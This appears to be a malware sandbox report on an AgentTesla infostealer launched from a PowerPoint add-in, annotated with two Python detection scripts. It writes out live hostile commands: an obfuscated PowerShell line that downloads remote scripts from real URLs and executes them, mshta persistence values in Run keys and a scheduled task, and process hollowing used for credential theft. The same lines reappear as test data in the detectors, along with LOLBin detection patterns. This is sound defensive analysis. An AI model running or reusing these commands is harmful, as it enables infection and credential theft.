Analysis
Max time kernel: 114s
Max time network: 149s
Platform: windows10_x64
Resource: win10-en-20210920
Submitted: 20-10-2021 06:38

Static task: static1
Behavioral task: behavioral1
  Sample: PO-20102021,pdf.ppam
  Resource: win7-en-20211014
Behavioral task: behavioral2 (the Windows 10 run shown in this report)
  Sample: PO-20102021,pdf.ppam
  Resource: win10-en-20210920
General
Target: PO-20102021,pdf.ppam
Size: 8KB
MD5: 3471cb088d588150df6e37e2200afbf9
SHA1: 90d89c9f5aaaae4c067f179651066303bc83f452
SHA256: 66a3e3be3b63626de046621d447103e0978f5b24d3de0f412230ed6c2bfd6e28
SHA512: f01dc429d369a8502320775bf7b8fd7d56e8790ef2b91bfeea0b65fa5abf69f57a13f05493ccedb6606152682307f748b88879bc4afbe304c1e04a83cb017fb6
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a .NET-based information stealer and remote access tool (RAT), originally written in Visual Basic .NET. It harvests saved credentials from browsers, mail and FTP clients and logs keystrokes; the browser, e-mail, FTP-client and SetWindowsHookEx signatures below are its collection phase.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  pid   pid_target  process    target process  description
  2596  3144        mshta.exe  POWERPNT.EXE    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process
-
AgentTesla Payload 2 IoCs
Processes:
  resource                                                    yara_rule
  behavioral2/memory/2900-324-0x00000000004376CE-mapping.dmp  family_agenttesla
  behavioral2/memory/1472-391-0x00000000004376CE-mapping.dmp  family_agenttesla
Both hits are in the two injected hosts (jsc.exe pid 2900 and RegAsm.exe pid 1472) at the same mapped address, 0x4376CE, which is consistent with one payload being injected twice.
-
Blocklisted process makes network request 10 IoCs
Processes:
  flow  pid   process
  28    2596  mshta.exe
  29    2596  mshta.exe
  31    2596  mshta.exe
  34    2596  mshta.exe
  36    2596  mshta.exe
  38    2596  mshta.exe
  40    2596  mshta.exe
  45    2596  mshta.exe
  51    2596  mshta.exe
  56    888   powershell.exe
-
Drops file in Drivers directory 2 IoCs
Processes:
  description                   ioc                                    process
  File opened for modification  C:\Windows\system32\drivers\etc\hosts  jsc.exe
  File opened for modification  C:\Windows\system32\drivers\etc\hosts  RegAsm.exe
The modified hosts file is among the files listed under Downloads; diff the dumped copy against a known-good hosts file to see which entries the payload added or redirected.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
  description  ioc  process
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  jsc.exe
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegAsm.exe
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegAsm.exe
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegAsm.exe
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  jsc.exe
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  jsc.exe
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
  description      ioc  process
  Key created      \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\""  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\""  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/6.html\""  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());"  mshta.exe
Four autorun values are written by the same mshta.exe stage: three re-launch MsHta against one URL (whose host is displayed in this report as "[email protected]" and cannot be recovered from the page), and takeCare re-runs the same PowerShell download cradle that appears in the process tree, with the command name broken up by backticks (I`E`X) and mixed case (pOweRshell.exe) to defeat naive string matching.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
  description                         pid  process         target process
  PID 888 set thread context of 2900  888  powershell.exe  jsc.exe
  PID 888 set thread context of 1472  888  powershell.exe  RegAsm.exe
Together with the repeated WriteProcessMemory calls from pid 888 into the same two targets (below), this is the process-hollowing pattern: spawn a signed .NET utility, overwrite its image, then redirect its main thread into the injected code.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's canned description calls this likely ransomware behaviour, but drive enumeration on its own is a weak signal; here it sits alongside infostealer activity (AgentTesla payload, browser and mail credential access), not encryption.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments. Here the reads come from POWERPNT.EXE itself, which Office does as a matter of course, so this entry (and the BIOS lookups below) carries little weight on its own.
Processes:
  description        ioc                                                                                    process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                       POWERPNT.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                  POWERPNT.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   POWERPNT.EXE
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution. Here mshta.exe registers a task named Bluefibonashi that re-runs MsHtA against the same URL as the Run keys every 80 minutes (see the schtasks.exe command line in the process tree).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description        ioc                                                         process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS          POWERPNT.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  POWERPNT.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     POWERPNT.EXE
-
Kills process with taskkill 2 IoCs
Processes:
  pid   process
  1140  taskkill.exe
  740   taskkill.exe
Both instances are launched by mshta.exe to force-close winword.exe and Excel.exe (see the process tree), presumably so that the document stage does not leave a visible Office window or a file lock behind.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid   process
  3144  POWERPNT.EXE
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
  pid   process
  316   dw20.exe
  316   dw20.exe
  888   powershell.exe
  888   powershell.exe
  888   powershell.exe
  888   powershell.exe
  888   powershell.exe
  2900  jsc.exe
  2900  jsc.exe
  1472  RegAsm.exe
  1472  RegAsm.exe
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
  pid   process
  1472  RegAsm.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1140  taskkill.exe
  Token: SeDebugPrivilege  740   taskkill.exe
  Token: SeDebugPrivilege  888   powershell.exe
  Token: SeDebugPrivilege  2900  jsc.exe
  Token: SeDebugPrivilege  1472  RegAsm.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
  pid   process
  3144  POWERPNT.EXE
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
  pid   process
  3144  POWERPNT.EXE
  3144  POWERPNT.EXE
  3144  POWERPNT.EXE
  2900  jsc.exe
  1472  RegAsm.exe
-
Suspicious use of WriteProcessMemory 35 IoCs
Processes (identical rows collapsed; "entries" is how many times each row appears in the report):
  description                       pid   process         target process  entries
  PID 3144 wrote to memory of 2596  3144  POWERPNT.EXE    mshta.exe       2
  PID 2596 wrote to memory of 1140  2596  mshta.exe       taskkill.exe    2
  PID 2596 wrote to memory of 740   2596  mshta.exe       taskkill.exe    2
  PID 2596 wrote to memory of 1432  2596  mshta.exe       schtasks.exe    2
  PID 2596 wrote to memory of 888   2596  mshta.exe       powershell.exe  2
  PID 2596 wrote to memory of 316   2596  mshta.exe       dw20.exe        2
  PID 888 wrote to memory of 4060   888   powershell.exe  jsc.exe         3
  PID 888 wrote to memory of 2900   888   powershell.exe  jsc.exe         8
  PID 888 wrote to memory of 2780   888   powershell.exe  csc.exe         2
  PID 2780 wrote to memory of 2460  2780  csc.exe         cvtres.exe      2
  PID 888 wrote to memory of 1472   888   powershell.exe  RegAsm.exe      8
The two-entry rows are a parent writing into a child it has just created, which is a normal side effect of process creation and not evidence of injection. The eight writes each into jsc.exe (2900) and RegAsm.exe (1472), from the same powershell.exe that then calls SetThreadContext on them, are the injection; the three writes into the first jsc.exe (4060) are not followed by a thread-context change and that process shows no further behaviour, so the first attempt appears not to have completed.
-
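The WriteProcessMemory and SetThreadContext tables above only become useful once the ordinary process-creation writes are separated from the injection. The following is an added example for this page, not sandbox code and not the malware's code: it replays the report's rows (constructed here from the pids and image names in the two tables) and classifies each (source, target) pair, so that only a pair with both writes and a thread-context change is called hollowing, and a write-only pair into a known hollowing host (HOLLOW_HOSTS is an assumed watch-list) is reported separately as a possible failed attempt.

```python
"""Separate real injection from ordinary process-creation noise in the
WriteProcessMemory and SetThreadContext tables of this report.

Added example for this page, not sandbox code and not the malware's code.
The event list is constructed from the pids and image names in the report's
signature tables; HOLLOW_HOSTS is an assumed watch-list."""
from collections import defaultdict

# Signed .NET framework utilities frequently chosen as hollowing targets
# (assumption: a write into one of these with no SetThreadContext still
# deserves a look, because the attempt may simply have failed).
HOLLOW_HOSTS = {"jsc.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
                "installutil.exe", "aspnet_compiler.exe"}

# (api, source_pid, source_image, target_pid, target_image, repeat count),
# transcribed from the report's 35 WriteProcessMemory and 2 SetThreadContext rows.
_ROWS = [
    ("WriteProcessMemory", 3144, "POWERPNT.EXE",   2596, "mshta.exe",      2),
    ("WriteProcessMemory", 2596, "mshta.exe",      1140, "taskkill.exe",   2),
    ("WriteProcessMemory", 2596, "mshta.exe",       740, "taskkill.exe",   2),
    ("WriteProcessMemory", 2596, "mshta.exe",      1432, "schtasks.exe",   2),
    ("WriteProcessMemory", 2596, "mshta.exe",       888, "powershell.exe", 2),
    ("WriteProcessMemory", 2596, "mshta.exe",       316, "dw20.exe",       2),
    ("WriteProcessMemory",  888, "powershell.exe", 4060, "jsc.exe",        3),
    ("WriteProcessMemory",  888, "powershell.exe", 2900, "jsc.exe",        8),
    ("SetThreadContext",    888, "powershell.exe", 2900, "jsc.exe",        1),
    ("WriteProcessMemory",  888, "powershell.exe", 2780, "csc.exe",        2),
    ("WriteProcessMemory", 2780, "csc.exe",        2460, "cvtres.exe",     2),
    ("WriteProcessMemory",  888, "powershell.exe", 1472, "RegAsm.exe",     8),
    ("SetThreadContext",    888, "powershell.exe", 1472, "RegAsm.exe",     1),
]
EVENTS = [row[:5] for row in _ROWS for _ in range(row[5])]


def correlate(events):
    """Group API calls by (source pid, target pid) and classify each pair.

    A parent writing into a child it just created (the two-row pairs above)
    is how CreateProcess sets up the child and is not evidence of injection.
    A source that both writes into a target and then calls SetThreadContext
    on it has replaced the target's code and redirected its entry thread:
    classic process hollowing.
    """
    counts = defaultdict(lambda: {"writes": 0, "context": 0})
    images = {}
    for api, spid, simg, tpid, timg in events:
        key = (spid, tpid)
        images[key] = (simg, timg)
        if api == "WriteProcessMemory":
            counts[key]["writes"] += 1
        elif api == "SetThreadContext":
            counts[key]["context"] += 1

    hollowed, write_only_hosts = [], []
    for key, c in counts.items():          # insertion order == event order
        simg, timg = images[key]
        rec = {"source_pid": key[0], "source_image": simg,
               "target_pid": key[1], "target_image": timg,
               "writes": c["writes"]}
        if c["writes"] and c["context"]:
            hollowed.append(rec)
        elif c["writes"] and timg.lower() in HOLLOW_HOSTS:
            # Writes into a known hollowing host with no thread redirect:
            # here jsc.exe pid 4060, which shows no further behaviour in the
            # report, so the first attempt appears not to have completed.
            write_only_hosts.append(rec)
    return {"hollowed": hollowed, "write_only_hosts": write_only_hosts}


if __name__ == "__main__":
    result = correlate(EVENTS)
    for rec in result["hollowed"]:
        print("hollowed: %(source_image)s (%(source_pid)d) -> "
              "%(target_image)s (%(target_pid)d), %(writes)d writes" % rec)
    for rec in result["write_only_hosts"]:
        print("writes without SetThreadContext: %(target_image)s (%(target_pid)d)" % rec)
```

On the report's rows this yields exactly the two hollowed hosts the YARA rule later matched (jsc.exe 2900 and RegAsm.exe 1472) and flags jsc.exe 4060 as a write-only attempt, while the parent-into-child pairs from POWERPNT.EXE, mshta.exe and csc.exe drop out. Requiring the SetThreadContext pairing is what keeps a rule like this from firing on every process launch.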
outlook_office_path 1 IoCs
Processes:
  description  ioc  process
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegAsm.exe
-
outlook_win_path 1 IoCs
Processes:
  description  ioc  process
  Key opened   \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  RegAsm.exe
Processes
Process tree (indentation is depth; pids are taken from the signature tables above where they are unambiguous):

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE  (pid 3144)
  "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-20102021,pdf.ppam" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\mshta.exe  (pid 2596)
    "C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdrufhjwijjd
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\schtasks.exe  (pid 1432)
      "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/6.html\""
      - Creates scheduled task(s)
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe  (pid 316)
      dw20.exe -x -s 2964
      - Suspicious behavior: EnumeratesProcesses
      (dw20.exe is the .NET error-reporting shim; its launch from mshta.exe means something in that stage threw an unhandled exception)
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (pid 888)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  (pid 4060; no further behaviour recorded)
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  (pid 2900)
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (pid 2780)
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdline"
        - Suspicious use of WriteProcessMemory
        (csc.exe and cvtres.exe under powershell.exe, working in a random temp directory, are the footprint of PowerShell Add-Type compiling C# at runtime; the n3y0mgtx sources and DLL it produced are listed under Downloads)
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (pid 2460)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES340C.tmp" "c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMP"
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  (pid 1472)
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: SetClipboardViewer
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - outlook_office_path
        - outlook_win_path

Reading the tree top to bottom: the .ppam add-in opened by PowerPoint launches mshta.exe against a bit.ly short link; the HTA stage kills Word and Excel, installs persistence (Run keys and the Bluefibonashi task), and starts a hidden PowerShell whose command line pulls two further scripts from usrfiles.com and executes them; that PowerShell compiles helper code with Add-Type and hollows the AgentTesla payload into jsc.exe and RegAsm.exe, which then read mail, browser and FTP credentials and modify the hosts file.
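The process tree above, the Run-key signature and the scheduled task all turn on the same three checks: an Office process spawning a script host, a PowerShell command line that is a download cradle once its backtick and case obfuscation is undone, and an autorun value that hands a URL to a LOLBin. The block below is an added example for this page, neither sandbox output nor the malware's code; PROCESS_TREE and AUTORUNS are constructed from this report's tree and Run-key signature (the schtasks action's quoting is simplified, and the MsHta URL's host is kept as the report displays it), and the name lists and regular expressions are assumptions a detection engineer would tune.

```python
"""Triage the command lines and autorun values shown in this report.

Added example for this page; it is neither sandbox output nor the malware's
code. PROCESS_TREE and AUTORUNS are constructed from the report's process
tree and Run-key signature (quoting of the schtasks action simplified); the
name lists and patterns are assumptions a detection engineer would tune."""
import re

# Office hosts that have no business launching script interpreters (assumed).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}

# IEX (or Invoke-Expression) fed from a network read: a remote code loader.
_CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*?"
    r"(webrequest|webclient|downloadstring|invoke-webrequest|readtoend)", re.S)
_URL = re.compile(r"https?://[^\s'\")]+")
_LOLBIN = re.compile(r"\b(mshta|powershell|wscript|cscript|rundll32|regsvr32)\b")


def normalize_powershell(cmd: str) -> str:
    """Undo the cheap obfuscation used here so patterns match what the
    PowerShell parser executes: drop backticks that only escape an ordinary
    character (I`E`X -> IEX) and fold case (pOweRshell -> powershell).
    Backticks before n t r 0 a b f v ` $ " ' are kept, since inside a
    double-quoted string those change the meaning."""
    cmd = re.sub(r"`(?![ntr0abfv`$\"'])", "", cmd)
    return cmd.lower()


def is_download_cradle(cmd: str) -> bool:
    return _CRADLE.search(normalize_powershell(cmd)) is not None


def suspicious_child(parent_image: str, child_image: str) -> bool:
    """The report's 'Process spawned unexpected child process' check."""
    return parent_image.lower() in OFFICE_PARENTS and child_image.lower() in SCRIPT_HOSTS


def suspicious_autorun(value: str) -> bool:
    """Run-key value or scheduled-task action that hands a URL to a LOLBin."""
    v = normalize_powershell(value)
    return _LOLBIN.search(v) is not None and _URL.search(v) is not None


def triage(process_tree, autoruns):
    """Return (kind, pid-or-name, evidence) findings over the constructed records."""
    findings = []
    image_of = {pid: image for pid, _, image, _ in process_tree}
    for pid, ppid, image, cmdline in process_tree:
        parent = image_of.get(ppid, "")
        if suspicious_child(parent, image):
            findings.append(("office_spawn", pid, f"{parent} -> {image}"))
        if image.lower() == "powershell.exe" and is_download_cradle(cmdline):
            m = _URL.search(normalize_powershell(cmdline))
            findings.append(("download_cradle", pid, m.group(0) if m else ""))
    for name, value in autoruns:
        if suspicious_autorun(value):
            lolbin = _LOLBIN.search(normalize_powershell(value)).group(0)
            findings.append(("autorun_lolbin", name, lolbin))
    return findings


# (pid, parent pid, image, command line); POWERPNT's own parent is unknown.
PROCESS_TREE = [
    (3144, 0, "POWERPNT.EXE",
     r'"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-20102021,pdf.ppam" /ou ""'),
    (2596, 3144, "mshta.exe", r'"C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdrufhjwijjd'),
    (1140, 2596, "taskkill.exe", r'"C:\Windows\System32\taskkill.exe" /f /im winword.exe'),
    (1432, 2596, "schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn "Bluefibonashi" /F /tr "MsHtA http://1230948%[email protected]/p/6.html"'),
    (888, 2596, "powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());'''),
    (2900, 888, "jsc.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"'),
]
# Run-key values written by mshta.exe plus the scheduled task, as displayed in
# the report (the host of the MsHta URL is shown there as "[email protected]").
AUTORUNS = [
    ("Run\\SAFEsounkkkd", r'"MsHta""http://1230948%[email protected]/p/6.html"'),
    ("Run\\Milalaasdasdlalal", r'"MsHta""http://1230948%[email protected]/p/6.html"'),
    ("Run\\Cleanreasdasdddsults", r'"MsHta""http://1230948%[email protected]/p/6.html"'),
    ("Run\\takeCare",
     r'''pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());'''),
    ("Task\\Bluefibonashi", r'"MsHtA""http://1230948%[email protected]/p/6.html"'),
]

if __name__ == "__main__":
    for kind, who, evidence in triage(PROCESS_TREE, AUTORUNS):
        print(f"{kind:16} {who!s:24} {evidence}")
```

Run as-is it reports one office_spawn (POWERPNT.EXE -> mshta.exe, pid 2596), one download_cradle (pid 888, with the first usrfiles.com URL as evidence) and five autorun_lolbin hits (three Run keys and the task via mshta, takeCare via powershell). The normalisation step is the part worth keeping: a rule that matches the literal string "IEX" misses I`E`X, and one that matches "powershell.exe" case-sensitively misses pOweRshell.exe, yet both run unchanged.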
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES340C.tmp
  MD5: 2caf3100fd09a5136a659a92ea1ffd47
  SHA1: de3a30532b02a678fd955983450115f8d2f85d84
  SHA256: 7fd8935962e1beba6dd81fe4cc7fbf8cded1ebd8335f52677554bd8a47d0db03
  SHA512: 6af2ad9a32222925665ffef58c161b48ccec9c6cde0bcb33c02fa6e908222d21bf84e7efd21876ddc5d5f87c6ddb4c5359faf353ff2ecedf58f7be24a3a01e6f
-
C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.dll
  MD5: fab23d12ab053e47245a70d4797d8be6
  SHA1: 5625f44448ed855064ed6095ea6b1e2e415416c7
  SHA256: 58c6d8e784368a18261952c7ee3688f1587b6fe260e059ea9c6871076f630374
  SHA512: 6b3fa660dc98762185e64b43e3c771bf389e9ce0385d8d5fc5bcc43d55cf44525f7879cc9ed282c1dc37854ce700f98bd776e32455f8ac917c8ab756ce8240ea
-
C:\Windows\system32\drivers\etc\hosts
  MD5: 5b2d17233558878a82ee464d04f58b59
  SHA1: 47ebffcad0b4c358df0d6a06ef335cb6aab0ab20
  SHA256: 5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
  SHA512: d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMP
  MD5: 39cfc0f99a9eb0ea5fca96ec5c828c4f
  SHA1: cce25468e348d6fd9691bed7d226cd3026eab587
  SHA256: db8aabeea3d53b2b368bb15bfa20babd64c6ec29f2f341a91beda2272837d71a
  SHA512: 4c8e0711fb8b78c4b31778cfe98ab2073cdf35aabce2abc1a1b25f7ac4da072dc24e79ddab5b97d9ff3fbc86ca4b444d750e3880d8d758cff2c124363a3c6462
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.0.cs
  MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
  SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
  SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
  SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdline
  MD5: a1ee74197f66fb8b0bf19b6ce9e70e15
  SHA1: e856627f45317f8e7019dded90612ed9c1d76226
  SHA256: 4f45ba3433e7d2a5df795781f7ae0529515a7d3b93a6d9adbf3737d8d1fbe376
  SHA512: 7db16ff7f47dea65ab185df4a1044e869f7176f793e7a23ef862f57daf6fbb24b2a1661209b6016848d1fbebf13917c23fba4cad02f3588fdd09447bad81894e
-
Memory dumps (the two 0x4376CE mappings, for pids 2900 and 1472, are the ones the AgentTesla YARA rule matched):
  memory/316-295-0x0000000000000000-mapping.dmp
  memory/740-292-0x0000000000000000-mapping.dmp
  memory/888-309-0x000001D7A1D53000-0x000001D7A1D55000-memory.dmp  (8KB)
  memory/888-294-0x0000000000000000-mapping.dmp
  memory/888-308-0x000001D7A1D50000-0x000001D7A1D52000-memory.dmp  (8KB)
  memory/888-310-0x000001D7A1D56000-0x000001D7A1D58000-memory.dmp  (8KB)
  memory/1140-291-0x0000000000000000-mapping.dmp
  memory/1432-293-0x0000000000000000-mapping.dmp
  memory/1472-408-0x00000000052C1000-0x00000000052C2000-memory.dmp  (4KB)
  memory/1472-397-0x00000000052C0000-0x00000000052C1000-memory.dmp  (4KB)
  memory/1472-391-0x00000000004376CE-mapping.dmp
  memory/2460-385-0x0000000000000000-mapping.dmp
  memory/2596-261-0x0000000000000000-mapping.dmp
  memory/2780-382-0x0000000000000000-mapping.dmp
  memory/2900-381-0x00000000055D0000-0x0000000005ACE000-memory.dmp  (5.0MB)
  memory/2900-324-0x00000000004376CE-mapping.dmp
  memory/2900-407-0x00000000055D0000-0x0000000005ACE000-memory.dmp  (5.0MB)
  memory/3144-121-0x000001AD1A100000-0x000001AD1A102000-memory.dmp  (8KB)
  memory/3144-120-0x000001AD1A100000-0x000001AD1A102000-memory.dmp  (8KB)
  memory/3144-119-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmp  (64KB)
  memory/3144-118-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmp  (64KB)
  memory/3144-117-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmp  (64KB)
